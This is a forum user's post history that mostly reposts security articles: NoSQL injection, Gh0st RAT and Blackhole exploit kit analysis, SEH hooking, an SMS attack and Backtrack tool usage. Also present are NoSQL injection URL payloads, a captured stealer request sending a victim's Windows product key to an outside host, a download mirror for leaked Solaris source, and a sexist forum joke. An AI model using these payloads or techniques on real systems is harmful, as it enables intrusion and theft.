Everything posted by Nytro

  1. HTML5 web security
     December 6th, 2011
     Document Name: HTML5_Web_Security_v1.0.docx
     Version: v1.0
     Author: Michael Schmidt, Compass Security AG
     Reviewer: Thomas Röthlisberger, Compass Security AG
     Date of Delivery: December 6th, 2011
     Classification: Article
     Overview of HTML5 web security by Michael Schmidt [michael.schmidt-@-csnc.ch], reviewed by Thomas Röthlisberger [thomas.roethlisberger-@-csnc.ch]. This article is an extract of the master thesis written by Michael Schmidt. The security-relevant aspects of HTML5 that were considered in this thesis are covered in the document. Note that the content of this document was released in May 2011. Compass Security makes regular updates to its HTML5 security know-how and provides additional information. Please visit Compass Security AG - Switzerland or contact us for the most current version.
     Download: http://media.hacking-lab.com/hlnews/HTML5_Web_Security_v1.0.pdf
  2. Time-Based Blind NoSQL Injection
     Authored by Felipe Aragon | Site syhunt.com
     Posted Dec 19, 2011
     This is a brief write-up discussing time-based NoSQL injection attacks using JavaScript.

     Time-Based Blind NoSQL Injection - Detecting server-side JavaScript injection vulnerabilities

     In July 2011, Bryan Sullivan, a senior security researcher at Adobe Systems, demonstrated server-side JavaScript injection vulnerabilities in web applications using MongoDB and other NoSQL database engines. He demonstrated how they could be used to perform Denial of Service, File System, Remote Command Execution and many other attacks, including the easy extraction of the entire contents of the NoSQL database -- a blind NoSQL injection attack (paper at https://media.blackhat.com/bh-us-11/Sullivan/BH_US_11_Sullivan_Server_Side_WP.pdf).

     We not only confirmed the published data about the NoSQL injection vulnerabilities, but also discovered that the MongoDB shell supports a sleep() function, which makes time-based detection of vulnerable web applications possible. It is also possible to inject custom sleep code, a technique that may be used to spot injection vulnerabilities in web applications using server-side JavaScript execution. This is not restricted to MongoDB. Below you can find two examples of NoSQL injection vulnerabilities in PHP that could be spotted using these techniques.

     Example 1: NoSQL Injection Vulnerability in PHP

     <?
     $mongo = new Mongo();
     $db = $mongo->demo;
     $id = $_GET['id'];
     $js = "function() { var id = '$id'; SOME CODE... }";
     $response = $db->execute($js);
     ...
     ?>

     The following requests would make this (or a similar) vulnerable web application sleep for 10 seconds. The MongoDB sleep() function takes milliseconds:

     vulnerable.php?msg=1';sleep(10000);var%20foo='bar

     Alternative technique using custom sleep code (works in any JavaScript engine, no sleep() builtin needed):

     vulnerable.php?msg=1';var%20d%20=%20new%20Date();%20var%20cd%20=%20null;%20do%20{%20cd%20=%20new%20Date();%20}%20while(cd-d%20<%2010000);var%20foo='bar

     Example 2: NoSQL Injection Vulnerability in PHP

     <?
     $mongo = new Mongo();
     $db = $mongo->demo;
     $year = $_GET['year'];
     $collection = $db->demo;
     $query = 'function() {var search_year = \'' . $year . '\';' .
              'return this.publicationYear == search_year || ' .
              ' this.filmingYear == search_year || ' .
              ' this.recordingYear == search_year;}';
     $cursor = $collection->find(array('$where' => $query));
     ...
     ?>

     Example 3: Sleep in JavaScript

     var date = new Date();
     var curDate = null;
     do { curDate = new Date(); } while (curDate - date < 10000); // delay time (ms)

     Solution
     Always validate user input used in server-side JavaScript commands.

     Article by Felipe Aragon. Originally published at http://www.syhunt.com/?n=Articles.NoSQLInjection
     ---
     Copyright © 2010 Syhunt Security
     Disclaimer: The information in this article is provided "as is" without warranty of any kind. Details provided are strictly for educational and defensive purposes. Syhunt is not liable for any damages caused by direct or indirect use of the information provided by this article.
     Source: Time-Based Blind NoSQL Injection - Packet Storm
  3. [h=1]Oracle Solaris 11 Kernel Source Leaked[/h]
     December 19th, 2011, 14:00 GMT · By Marius Nestor
     As Phoronix announced a couple of minutes ago, it appears that a snapshot of the kernel source code for Oracle's Solaris 11 operating system has been leaked on major torrent and file hosting sites. Searching for "solaris11.tar.bz2" on Google, Softpedia can also confirm that the bzip2 archive of about 104 MB contains the source code of the Oracle Solaris 11 kernel. Since Solaris 11 is a closed-source operating system, Oracle is probably trying right now to get the leaked archive removed from the aforementioned sites. Oracle announced the Oracle Solaris 11 cloud operating system on November 9th, supporting the security, scalability and performance requirements of cloud-based deployments. Oracle Solaris 11 brings features like the ZFS filesystem, virtualization capabilities, comprehensive management, "secure by default" settings and cloud-scale life cycle management, and is certified for SPARC and x86.
     Mirror: Download solaris11.tar.bz2 for free on uploading.com
     Source: Oracle Solaris 11 Kernel Source Leaked - Softpedia
  4. [h=1]Analyzing malware using Sysinternals’ VMMap[/h]
     Posted by Chief Banana on December 19, 2011
     In May 2011, Sysinternals released a new tool called ‘VMMap’. According to the website: ‘VMMap is a process virtual and physical memory analysis utility. It shows a breakdown of a process’s committed virtual memory types as well as the amount of physical memory (working set) assigned by the operating system to those types. Besides graphical representations of memory usage, VMMap also shows summary information and a detailed process memory map’.
     While analyzing a piece of malware for a chapter in a book, I discovered how useful this tool is. I had already identified that a suspicious connection was using PID 1040. Investigating the processes around this PID, it became clear that it belonged to one of the ‘svchost’ processes. Another interesting file used by this process was called ‘6to4ex.dll’.
     Opening VMMap from a forensic CD-ROM, the tool asked which process to start with. In this case I selected ‘SVCHOST’ with PID 1040. Next, the breakdown of this process’s committed virtual memory types and the files it uses are visible. Under the svchost process overview, the ‘6to4ex.dll’ file was also shown. Selecting this file and using the shortcut ‘CTRL+T’, which activates the strings view, very interesting strings from this file became visible.
     The interesting strings about the malware used and its capabilities:
     · %s\shell\open\command
     · Gh0st Update
     · E:\gh0st\server\sys\i368\RESSDT.pdb
     · \??\RESSDTDOS
     · ?AVCScreenmanager
     · ?AVCScreenSpy
     · ?AVCKeyboardmanager
     · ?AVCShellmanager
     · ?AVCAudio
     · ?AVCAudiomanager
     · SetWindowsHookExA
     · CVideocap
     · Global\Gh0st %d
     · \cmd.exe
     By searching for more details around the term ‘Gh0st’ and backdoor, it became clear that this might be a Chinese Remote Access Tool (RAT) that is commonly known to be used in targeted attacks.
     Features of this RAT are: capturing audio/video/keystrokes, remote shell, remote command, file manager, spying on the screen and many more. Definitely VMMap will be part of my malware IR kit.
     Source: Analyzing malware using Sysinternals’ VMMap | securitybananas.com
  5. NoScript detection with CSS
     The parent page embeds a 180px-wide iframe and immediately widens it to 400px with JavaScript. If NoScript blocks the script, the frame stays at 180px, and a media query inside the framed page (max-width: 200px) switches which message is displayed, so the framed page can tell whether scripting ran in the parent without running any script itself.

     <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
     <html xmlns="http://www.w3.org/1999/xhtml">
     <head>
     <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
     <title>Test</title>
     </head>
     <body>
     <iframe src="detection.html" width="180" id="testframe"></iframe>
     <script type="text/javascript">
     document.getElementById("testframe").style.width = "400px";
     </script>
     </body>
     </html>

     detection.html:

     <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
     <html xmlns="http://www.w3.org/1999/xhtml">
     <head>
     <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
     <title>detection</title>
     <style type="text/css">
     .active { display: none; }
     .notactive { display: block; }
     @media screen and (max-width: 200px) {
       .active { display: block; }
       .notactive { display: none; }
     }
     </style>
     </head>
     <body>
     <div class="active">Noscript is active</div>
     <div class="notactive">Noscript is not active</div>
     </body>
     </html>

     Source: Test Tricky...
  6. GET /steler/index.php?action=add&a=4&c=JOHN-66E06C37B1&u=-&l=Microsoft Windows XP Professional&p=VGBRV-X2DDM-JYDFW-22MQW-3G39Y HTTP/1.1
     Accept: */*
     Accept-Language: en-us
     Accept-Encoding: gzip, deflate
     User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
     Host: www.cruciatii.in
     Connection: Keep-Alive

     @alexbest Permanent ban. If you want to talk to him: cs.alexbest @ IM
     He is from Stefanesti, probably from the countryside, so well...
     So the program is actually a Firefox stealer, and probably of other things too.
  7. [h=1]Remote SMS Attack Can Force Mobile Phones to Send Premium-rate Text Messages[/h]By Lucian Constantin Dec 19, 2011 3:50 pm Attackers can force mobile phones to send premium-rate SMS messages or prevent them from receiving messages for long periods of time by leveraging a logic flaw in mobile telecommunication standards. The flaw was discovered by independent security researcher Bogdan Alecu, who demonstrated how it can be exploited at the DefCamp security conference in Romania on Saturday. Alecu exploited the way mobile devices process text messages intended for special applications called SIM Toolkits, which he said are preloaded on SIM cards by over 90 percent of mobile operators. The applications can perform actions that include checking credit or voice mail, calling emergency numbers or customer support, and even performing mobile banking, and typically appear on the phones as a menu or application bearing the operator's name. SIM Toolkits can receive commands through specially-formatted SMS messages, but in order for these commands to be executed successfully, the message headers must contain a valid digital signature. The vast majority of mobile phones don't display any notification when they receive SIM Toolkit messages, he said. Some wake from their sleep state, but no message is visible in the inbox and there's no other indication that a message was received. The encryption used to verify message authenticity is pretty solid and can't be cracked, Alecu said. Instead, his attacks rely on phones automatically returning error messages rather than executing legitimate commands. [h=2]Automatic Replies by Default[/h] Error replies are sent automatically. Users of some phones might see a message is being sent, but they can't usually stop it. Alecu tested his exploits on phones from various manufacturers. Only devices from Nokia have an option to ask phone owners to confirm sending a SIM Toolkit response. 
The option, "Confirm SIM Service Actions," is usually off by default, especially on phones configured by operators. He tested phones from High Tech Computer (HTC) and Samsung Electronics running stock Android firmware, and an LG Optimus One with CyanogenMod, a community-built version of the popular mobile operating system. None of them displayed a notification when sending SIM Toolkit responses, and he found no option to block responses. BlackBerry devices presented a similar behavior, he said. Windows Mobile 6.x devices and iPhones notified users a message was being sent, but offered no way to stop it. Alecu hadn't yet tested a Windows Phone 7 device. The sender of a SIM Toolkit service message can request that the phone reply via SMS either directly to the sender's number, or to the operator's message center, according to Alecu. [h=2]How Scammers Attack[/h] Those two options give rise to two different attack scenarios, he said. For the reply-to-sender option (SMS-SUBMIT), an attacker could force the sending of the error message to a premium-rate number using an SMS spoofing service. SMS spoofing is the practice of changing the originating number of a text message to anything the sender desires. This can have legitimate as well as malicious purposes, and there are many online services that provide the feature for a small fee. Some mobile operators have strict rules on setting up premium-rate numbers. Applicants might be asked to prove that they are a registered business and provide information about how the number will be used. Restrictions can also be placed on the text strings that a message must contain in order for the sender to be charged, which would limit this attack because the attacker can't control the content of the automatic response. However, the number and diversity of existing SMS scams is proof that obtaining a premium-rate number is not that difficult. 
If the second option (SMS-DELIVER-REPORT) is used, the error is sent to the operator's message center where it is interpreted as a message delivery failure. When messages can't be delivered, because a phone is turned off or outside the service area, operators usually attempt to resend the undelivered message every few minutes for a predefined period of time. When this happens, all subsequent messages intended for that number are placed in a queue to be delivered when the phone re-joins the network. Because receiving a bogus SIM Toolkit message will always result in an error response, a loop is created between the message center and the phone, preventing the subscriber from receiving legitimate messages. This denial-of-service (DoS) condition is not permanent and after a while, typically 24 hours, the undelivered message is automatically discarded. However, if an attacker were to send seven bogus SIM Toolkit messages one after the other, the message center would attempt to deliver each of them for 24 hours, resulting in a week of SMS DoS. [h=2]Flaw Revealed[/h] Alecu demonstrated the attacks on SIM cards from multiple operators in Romania, Bulgaria, Austria, Germany and France. However, since the attacks exploit a logic flaw in the GSM standard and later mobile standards, he believes that the majority of operators that use SIM Toolkits are affected. Mitigating the attack is possible at both operator and device level. Operators can filter SIM Toolkit messages and restrict which numbers are allowed to send them. This would be an elegant solution, but Alecu has yet to find an operator that implemented it. Phone manufacturers could enforce confirmation for SIM actions from their software. However, this fix will probably not be as effective as message filtering at operator level, Alecu said. Firmware updates are not always easy to install, especially on older phones. 
Performing a firmware upgrade in the wrong way can render devices unusable and many affected phones might not even be supported anymore. The U.S. Computer Emergency Readiness Team (US-CERT) was notified of the problem in August 2010, and was asked to coordinate the disclosure process, Alecu said. He said Research In Motion (RIM) has contacted him and is working on a fix. "We are aware of the claims and are investigating them," Nokia spokesman Tomi Kuuppelomäki said. Samsung, HTC, RIM and Apple did not return a request for comment. Sursa: Remote SMS Attack Can Force Mobile Phones to Send Premium-rate Text Messages | PCWorld Business Center
  8. Here there are no girls or boys, only members, regardless of sex. The reason is simple: sexual, ethnic or any other kind of discrimination happens. But we believe in freedom of expression, so they are allowed.
  9. "If it is not free, it is a product. If it is free, maybe you are the product."
  10. Microsoft has launched a social network (Video)
     Author: Emilian Nedelcu, Monday, 19 December 2011, 08:24
     Microsoft recently launched a social network called So.cl (read "social"), which for now is available to a limited number of people. Company representatives stated that So.cl will be a social network for students, to help them share information quickly, build pages or obtain information quickly, turning the Internet and existing social networks into one big classroom. Similarly, Facebook, the largest social network in the world with over 800 million users, was initially intended only for a small number of students. So.cl is an experimental research project, according to Microsoft officials, available to students in the computer science and design departments of Washington University, Syracuse University and New York University. Other universities will be added over time. So.cl was designed for students, to extend their educational experience and help them rethink how they learn and communicate. Users can write posts surrounded by elements such as photos, video or text. Users can find other users with similar interests, and the network allows communities to be built around a particular (educational) goal. So far, So.cl brings nothing new; all of these features are present in Facebook, for example. So.cl users can follow other people or set up feeds. Users can also follow only certain people or see what all their registered friends write.
     Source: Microsoft si-a lansat retea sociala (Video)
  11. No, that's our Gecko: Gecko (layout engine) - Wikipedia, the free encyclopedia
  12. Ah, made by you, congratulations. But I think the first version looked better.
  13. Jokes about the "kitchen", it's definitely a girl. Welcome.
  14. Reverse Engineering Mac OS X
     Mac OS X
     2005 and before
     - Mach-O Infection.ppt (presentation)
     - Breaking Mac OS X.ppt (presentation)
     - Hacking Mac OS X Kernel for unsupported machines.pdf (paper)
     - MacOS Kernel Insecurity.pdf (presentation)
     - Overriding Mac OS X.pdf (paper)
     - A Debugger with Gui in OS X.pdf (paper)
     2006
     - Abusing Mach on Mac OS X.pdf (paper)
     2007
     - Hacking Leopard.pdf (paper)
     - Inside the Mac_OS X_kernel.pdf (paper)
     2008
     - BlackHat-Japan-08-Miller-Hacking-OSX.pdf (presentation)
     - BH-US-08-Dtrace The Reverse Engineer’s Unexpected Swiss Army Knife (presentation)
     - iRK – Crafting OS X Kernel Rootkits (presentation)
     - RETrace – Applied Reverse Engineering on OS X – defcon-16.pdf (presentation)
     - Under the iHood – REcon 2008.pdf (presentation)
     - Covering-tracks-Mac-OS-leopard_5991.pdf (paper)
     - OSX_Rootkits – the next level.pdf (presentation)
     2009
     - Advanced Mac OSX Rootkits.pdf (paper)
     - Defcon-17-bosse_eriksson-kernel_patching_on_osx.pdf (presentation)
     - D1T1 – Dino Dai Zovi – Mac OS Xploitation.pdf (presentation)
     - Advanced-Mac-OS-X-rootkits.pdf (presentation)
     - Dynamic Tracing for Exploitation and Fuzzing-final.pdf (presentation)
     - Mac-os-malware-analysis_33178.pdf (paper)
     - Objective-c-internals.pdf (presentation)
     - Hacking Macs for Fun and Profit – csw09-daizovi-miller.pdf (presentation)
     - Macos xploitation-source2009.pdf (presentation)
     - Debugging Cocoa with DTrace.pdf (paper)
     - BlackHat-DC-09-Iozzo-Macho-on-the-fly.pdf (presentation)
     - Dynamically Overriding Mac OS X – Down the Rabbit Hole.pdf (presentation)
     - Encryption Wrapper on OSX.pdf (presentation)
     2010
     - Function-hooking-for-OSX-and-Linux.pdf (presentation)
     - Mac Os X Hacking SnowLeopard.ppt (presentation)
     - BH-DC-2010-Advanced-Mac-OS-X-Physical-Memory-Analysis-slides.pdf (presentation)
     - BH-DC-2010-Advanced-Mac-OS-X-Physical-Memory-Analysis-wp.pdf (paper)
     - Post exploitation techniques on OSX and Iphone – eusecwest.pdf (presentation)
     - Programacion de rootkits en Mac OS X.pdf (paper, in Spanish)
     2011
     - Defiling-Mac-OS-X-Kernel-Rootkits-Ruxcon.pdf (presentation)
     - Hacking at mach2.pdf (presentation)
     - The Apple Sandbox – BHDC2011-Paper.pdf (paper)
     - The Apple Sandbox – BHDC2011-Slides.pdf (presentation)
     - Battery Firmware Hacking.pdf (paper)
     - iSEC_BH2011 – Macs in the Age of APT.pdf (presentation)
     iOS
     2009
     - BlackHat-Europe-2009-Miller-Iozzo-OSX-IPhone-Payloads-whitepaper.pdf (paper)
     2010
     - iPhone Rootkit Toorcon 2010.pdf (presentation)
     - D2T1 – Cedric Halbronn and Jean Sigwald – iPhone Security Model.pdf (presentation)
     2011
     - D1T2 – Laurent Oudot – Extracting Senstive Data from Your iPhone.pdf (presentation)
     - D2T2 – Jean-Baptiste Bédrune & Jean Sigwald – iPhone Data Protection in Depth.pdf (presentation)
     - Auditing iPhone and iPad applications – van Sprundel.ppt (presentation)
     - Practical Consideration of iOS Device Encryption Security.pdf (paper)
     - Apple iOS 4 Security Evaluation.pdf (presentation)
     - BH_US_11_DaiZovi_iOS_Security_WP.pdf (paper)
     - BH_US_11_Belenko_iOS_Forensics_Slides.pdf (presentation)
     - BH_US_11_Belenko_iOS_Forensics_WP.pdf (paper)
     - BH_US_11_Esser_Exploiting_The_iOS_Kernel_Slides.pdf (presentation)
     - BH_US_11_Esser_Exploiting_The_iOS_Kernel_WP.pdf (paper)
     - D2T1 – Stefan Esser – iPhone Exploitation – One ROPe to Bind Them All.pdf (presentation)
     - D2 SIGINT – Keith Lee – iPhone Espionage.pdf (presentation)
     - D1T1 – Stefan Esser – Antid0te 2.0 – ASLR in iOS.pdf (presentation)
     - SysScan-Singapore-Targeting_The_IOS_Kernel.pdf (presentation)
     Source: Papers | Reverse Engineering Mac OS X
  15. [h=3]SEH Hooking[/h][h=2]Saturday, December 17, 2011[/h]
     In this example, I will cover a method of hooking which uses SEH (Structured Exception Handling) to hook code at any location without overwriting the code. This method is very much like the exception-based hooking many debuggers use to place breakpoints, but with two small differences. Instead of writing INT3 breakpoints and catching the BREAKPOINT exception, I'm setting the memory to PAGE_NOACCESS and catching the ACCESS_VIOLATION exception. Instead of writing the address of my handler into the thread's SEH chain directly, I'm using a VEH (Vectored Exception Handler), which is registered with the AddVectoredExceptionHandler() WinAPI function.
     This method works by changing the protection of the page containing our hook location to PAGE_NOACCESS. When this memory is executed, our VEH catches an ACCESS_VIOLATION exception. It then checks the instruction pointer to see whether the violation occurred at the location of our hook. If this ACCESS_VIOLATION is not our hook, we return CONTINUE_SEARCH to allow other handlers to work with the exception. However, if it is our hook, we do three things:
     1. Execute our hook's callback
     2. Restore the memory protection to its original state
     3. Set the trap flag, which will trigger a single step
     We then return CONTINUE_EXECUTION. This time, the hooked code executes its first instruction normally and then triggers a SINGLE_STEP exception. This single step is a result of setting the trap flag, and it lets us set the hooked memory back to PAGE_NOACCESS so our hook fires again the next time the hooked memory is executed. Since our exception handler's ContextRecord contains the stack pointer, we can also read function arguments and return addresses from the stack. Because of this, we can block the execution of a function or change its input, just like with a normal hook.
To block execution, we can place a JMP [ReturnAddressFromStack] in our hook handler. While this jumps right back into execution and skips steps 2 and 3 of our exception handling, it is jumping back to the calling function and not the hooked code. The NOACCESS remains in place for next time. While this rendition of SEH Hooking isn't flawless, it does illustrate the concept and get the job done. In most cases, if you plan on using SEH Hooking, I would recommend using INT3 Breakpoints, though. This method, however, is a good way to bypass modification detection. While programs may checksum their code, they don't usually verify the memory protection of every page in the program. In the example code, I hook the MessageBoxA() WinAPI Function. Inside my handler, I call printf() to print the caption and text to the console. I then block execution of MessageBoxA(). Sursa: Rev++: SEH Hooking
  16. [h=3]Intro to javascript malware analysis[/h]
     Posted by Ax0n
     I am by no means an expert on this stuff. A few weeks ago, I ran across some suspicious links in spam and decided to see where they led. Some of them claimed to be from financial institutions that I have absolutely no connection to, and claimed that some transaction had failed to occur. Others were variants of shipping confirmation scams, pharmacy junk, etc. I wish I could say that I have no idea how people fall for these, but the fact is that some people will literally click on anything that shows up in their inbox, open any attachment and follow any link, no matter how blatantly fake we professionals think these scams are.

     What lay at the tail end of all the <script src="http://some-site/whatever.js"> includes and document.location redirects? A web page that had been owned, filled with a huge pile of nonsensical gibberish that could barely pass as JavaScript, which happened to be part of the Blackhole Exploit Kit. I've done my share of picking apart obfuscated JavaScript before, but it had been a while. I gave a presentation on this same thing at KC2600 a few weeks ago. Then, this week, a colleague of mine who missed the meeting ran into the same thing in the wild. I passed on what I'd learned, and decided it might be time to write it up with a little more detail than I did a few weeks back. He made this quick video that covers how he was able to de-obfuscate this particular sample:

     By now, I've seen several different obfuscation schemes for Blackhole, but once it's decoded, it all looks about the same.

     The introductory basics are simple. Minimize the potential of infection by using a non-privileged account (and perhaps an OS other than Windows) and/or minimize the impact of a successful infection by running a virtual machine that you can blow away or revert to a snapshot of a known clean state. For the malware I'm using in this example, either (or both) of the above will be ample to keep things from getting out of control. Other malware may be more insidious or may target non-Windows platforms. I have a few friends who have unwittingly infected their own workstations while trying to analyze things. Play safe.

     Once you have a safe lab environment, your goal is to examine a suspicious link and dissect it. In my case, I was able to find a few links to malware in my personal mail's spam folder. For the demo at KC2600, I used Malware Domain List to find some Blackhole samples. In the wild, there may be any number of redirects ahead of the malware. You may see a shortened URL (through goo.gl, tinyurl, etc.) which goes to a sparse HTML page with several calls to JavaScript hosted on various sites, and those scripts may simply be a document.location pointing to the malware. I usually stick with curl or wget to pull down suspicious links, and then I keep looking at the content and following the redirects until I strike gold.

     The JavaScript itself is ugly once you get to it. Sometimes the byte array is only a few (really long) lines. Other times, like this sample, each byte of the obfuscated data is on a new line, like this:

     You'll see a few interesting things. There's an "e=eval;" line near the bottom, and then "e(c);" after that. It doesn't take a coding genius to realize that this is a way to call eval(c) without triggering IDS signatures that look for "eval(". Many samples I saw weren't quite this obvious. In fact, the script in the video has the eval alias in a different part of the script, and varies in several other ways.

     To turn this cryptic payload into something that resembles actual JavaScript, there's a post on SANS ISC from several years ago covering a few methods. I went with the so-called Tom Liston Method, essentially wrangling the decoded data that was destined for eval into a document.write within a textarea box instead. Note: I ran into one sample of Blackhole that has a /textarea tag near the beginning, which would keep someone from easily viewing the code with this trick, but I don't think it will eval the stuff behind it since the call has been changed to a document.write.

     In the above example (and in the video), the content that is destined for eval is stored in the variable "c", so you simply replace "e(c);" with:

     document.write('<textarea cols="150" rows="100">' + c + '</textarea>');

     But obviously, you need to use some brain power here to figure out what trickery they're using to call eval, and what the variable is that needs to be wrapped up in the above document.write command. You may also wish to mess with the rows and columns on the textarea. I know on my netbook, that textarea size is far too unwieldy. On my desktop, it's almost perfect. Make sure the file is renamed as a .html, then load it up in your safe lab environment's browser, just in case something goes wrong. Voila.

     If you scroll through recent versions of the Blackhole Exploit Kit, you'll see that it tries to load an embedded Java applet and a PDF, both of which are designed to exploit recent vulnerabilities in the JRE and Adobe Reader. Since I don't have Windows running in a VM environment (and I'm not keen on actually infecting any of my Windows boxes) I'm not entirely sure what gets loaded from there. I'm guessing the Carberp trojan, given most of what I've read lately. If that's the case, a successful infection would likely block access to anti-malware sites, try to sabotage existing security software, and start gathering sensitive data such as card numbers and online banking credentials.
     Source: HiR Information Report: Intro to javascript malware analysis
  17. [h=2]Web Analysis, Vulnerability Assessment and Exploitation using Backtrack5[/h]
     December 16th, 2011 | By: Hari Krishnan
     Web application analysis plays a major role in a vulnerability assessment/penetration test. Proper information about the web application (for example the type of plugins used, or the CMS type, whether it is Joomla, WordPress, etc.) helps the pentester pick the right exploit and reduces the overall time spent doing so. Backtrack 5 comes with a very good set of tools for all the necessary information gathering. The categories of tools for web application analysis are:
     - CMS Identification
     - IDS/IPS Detection
     - Open Source Analysis
     - Web Crawlers
     - Vulnerability Assessment and Exploitation
     - Maintaining Access

     [h=2]CMS Identification:[/h]
     blindelephant, cms-explorer, whatweb

     [h=3]BlindElephant[/h]
     BlindElephant is a Python-based tool for fingerprinting web applications. It attempts to discover the version in use by comparing the static files at known locations against hashes pre-computed for each version of those files. The tool is fast, non-invasive, uses little bandwidth and is highly automated.
     Usage:
     root@root:/pentest/web/blindelephant/src/blindelephant# python BlindElephant.py [options] url appName
     We can use “guess” as the appName if we are not sure which web application or plugin is in use.

     [h=3]CMS-Explorer[/h]
     CMS-Explorer is another web application fingerprinting tool (written in Perl) that identifies the CMS in use so that the attack can be tailored to that information. It has a few extra features, such as checking OSVDB for vulnerabilities in the detected plugin or CMS, updating its lists of WordPress and Drupal plugins, verbosity and looking into themes, all of which give the pentester a lot of information for the PT.
     Usage:
     root@root:/pentest/web/cms-explorer# perl cms-explorer.pl -url target -type type [options]

     [h=3]WhatWeb[/h]
     WhatWeb identifies content management systems (CMS), blogging platforms, stats/analytics packages, JavaScript libraries and web servers. It has over 900 plugins, supports proxies (including Tor), accepts IP ranges in Nmap-like syntax, offers fuzzy matching, and so forth.
     Usage:
     root@root:/pentest/web/whatweb# ./whatweb target.com
     ./whatweb -l lists the available plugins.

     [h=2]IDS-IPS detection[/h]
     While performing a VA/PT on a domain, an IDS/IPS may be in place, which can stop various attacks against the domain. Many WAFs are sold to companies as a valid mitigation for web application vulnerabilities. Luckily, a WAF is easy to detect because most use signature-based detection, so the attacker can try to encode the attack parameters to bypass it. Backtrack comes with two handy tools for detecting IDS/IPS: waffit and ua-tester.

     [h=3]Waffit:[/h]
     Waffit (wafw00f) is a web application firewall detection tool. Detecting the firewall in front of the domain is an important step in the penetration testing process: a WAF can itself introduce vulnerabilities if it is misconfigured, so analyzing it is also a major concern during a VA/PT. WAFs are usually easy to detect and can be bypassed by encoding the attack parameters.
     Usage:
     root@root:~$ python wafw00f.py target.com

     [h=2]Open-Source Analysis:[/h]
     Open-source analysis is done with tools like ghdb, revhosts, xssed and maltego. The ghdb and xssed entries link to websites, while the other two are tools.
     GHDB: GHDB stands for Google Hacking Database. The exploit-db team maintains a database of Google dorks that comes in handy for pentesters gathering information. We can use the dorks to find certain types of vulnerable servers or other information. For example, a Google dork like “Microsoft-IIS/6.0” intitle:index.of can be used to find servers running Microsoft IIS 6.0. Another advantage is that it gives a little anonymity, as well as helping pentesters attack or perform a VA with more precision.
     Xssed: Xssed.com is a website listing cross-site-scripting-vulnerable websites, submitted by various authors. Pentesters can search for their target in the xssed.com database or check for other information that can be helpful during the VA/PT.
     Revhosts: Revhosts is a passive information gathering project. It is written in Python and helps pentesters gather information such as hosts, virtual hosts, DNS entries, directories, mail addresses, subnets, etc. This tool comes in both GUI and console versions.

     [h=2]Web Crawlers:[/h]
     The final category of web application analysis is the web crawler. The tool found in BT5 is called webshag, and it comes in both GUI and console versions. Webshag can scan a web server over HTTP or HTTPS, through a proxy and using HTTP authentication. Webshag has options like port scanning, gathering basic information, spidering and fuzzing.
     Download: SCRT :: Attack : Downloads : Webshag

     [h=2]Vulnerability Assessment and exploitation:[/h]
     The vulnerability assessment stage is where we scan our target for loopholes or bugs. Gathering information about the target beforehand makes this more effective; the information gathering phase remains the key step before performing further attacks, simply because it makes the work easier. So, for example, in the first stage we used CMS scanners like BlindElephant and found the version of the application installed; here it is Joomla. In the vulnerability assessment stage we then use a scanner like joomscan. Below is the image showing the vulnerability in a particular site.
     Usage:
     ./joomscan.pl -u target.com (or IP address)
     joomscan scans all the installed plug-ins and gives details about their vulnerabilities. We can use this information for further attacks.

     SqlMap: SqlMap is another good tool in the vulnerability assessment category. It tests whether the target URL is injectable. Below is an example where the highlighted text tells us that the parameter “newId” is vulnerable.
     Usage:
     ./sqlmap.py -u target.com -f

     Fimap: fimap is a Python-based tool that can find, prepare, audit, exploit and even google automatically for local and remote file inclusion bugs in web apps. More modules and functionality are being added, making it even more powerful. Fimap also lets us add our own payloads.
     Usage:
     fimap -u example.com
     -u defines the target URL.
     To scan a list of URLs from a text file:
     fimap -m -l '/tmp/urlscan.txt'
     -m is for mass scanning, -l is for the list.
     To scan websites found via Google dorks:
     ./fimap.py -g -q 'inurl:include.php'
     -g searches Google, -q is the query to search for.
     Fimap can exploit the vulnerable target and can also upload an interactive shell for further exploitation.

     Xsser: XSSer is an automatic framework to detect, exploit and report XSS vulnerabilities. It comes with options for bypassing filters and other injection modes.
     Usage:
     ./XSSer.py -u "http://www.target.com" -g "Search.php?tfSearch=" --referer "666.666.666.666" --user-agent "correctaudit"
     This tool gives information like the attack URL, browsers and the attack method. Once a vulnerable URL is detected, we can open it in a browser to confirm.

     theHarvester: theHarvester gathers user names, email accounts and hostnames/subdomains from public sources (for example Google, Bing, etc.). This tool again helps the pentester during the initial stage of a VA/PT.
It can be found in the “Web open source assessment ” option under web vulnerability assessment. Usage: ./theHaervester.py –ld [target domain] –d [ data source] The domains and the emails related to the particular website are being extracted, which can help for further attacks or research about the target. Shodan: This is, again, another web-based assessment tool of particular usefulness for pentesters. It can be used to gather a range of intelligence about the target devices which are connected to the internet. We can, for example, search to see if any network devices like routers, Voip, Printers, cams etc. are in place. To search if any service is running in the domain, the syntax would be: Syntax: Hostname:target.com port:80,21,22 Or simply to find out the results about the hostname, then simply search for Syntax: Hostname:target.com W3af: W3af is auditing and web application attack tool. It’s basically divided into various modules like attack, audit, exploit, discovery, evasion, brute force, and mangle, all of which can be used accordingly. These modules in w3af comes with various sub modules like, for example, we can select sqli option in Audit module, assuming that we need to perform a particular type of auditing. The below diagram shows a brief flowchart of the target website and makes it’s more easy to understand. Once the scan is completed, the W3af framework shows detailed information about the vulnerabilities found in the target website which can be compromised accordingly for further exploitation. Once the vulnerability is found, we can configure the plugins in the “Exploit” tab and perform further attacks, which can help us to get a webshell in the target site. Another major advantage is W3af also comes with MSF for taking the attack to next level. The results can be exported to html format, also. 
